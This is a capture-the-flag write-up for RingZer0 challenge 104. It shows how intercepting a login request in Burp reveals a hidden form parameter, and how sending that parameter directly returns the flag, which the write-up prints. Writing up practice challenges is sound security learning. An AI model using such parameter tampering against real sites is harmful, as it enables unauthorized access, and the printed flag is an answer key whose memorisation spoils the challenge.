RingZer0-104 - Admin Panel
Admin panel
Looking for clues
The only thing that was we have is a username and password box.
We’ll open burp and use it as a proxy to intercept all the requests.
If we type anything as username and password and intercept the request we get something like this.
A 302 http code means that it’s a redirection. That’s why we see the button Follow redirection.
HTTP/1.1 302 Found
Date: Mon, 10 Apr 2017 01:17:05 GMT
Server: Apache
X-Powered-By: PHP/5.4.45-0+deb7u7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /challenges/104/?error
Vary: Accept-Encoding
Content-Length: 7950
Connection: close
Content-Type: text/html
We see that’s there’s a hidden form.
<form action="/challenges/104/" method="get">
<input type="hidden" class="form-control" value="yesIwantaflag" name="showflagforme" />
<input type="submit" class="btn btn-success form-control" value="Generate" style="margin-top: 12px" />
</form>
We can use the value and the name in the hidden form to call it directly.
We can insert a url parameter in burp to get the right POST request.
POST /challenges/104?showflagforme=yesIwantaflag HTTP/1.1
Host: ringzer0team.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://ringzer0team.com/challenges/104
Cookie: flag=0; PHPSESSID=hkokb466h6bn3277umdhovad40; _ga=GA1.2.1728334630.1491778550
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=admin&password=lol
The flag is : FLAG-Sfi8sZgAK0ddMjVSOQU2rMfUW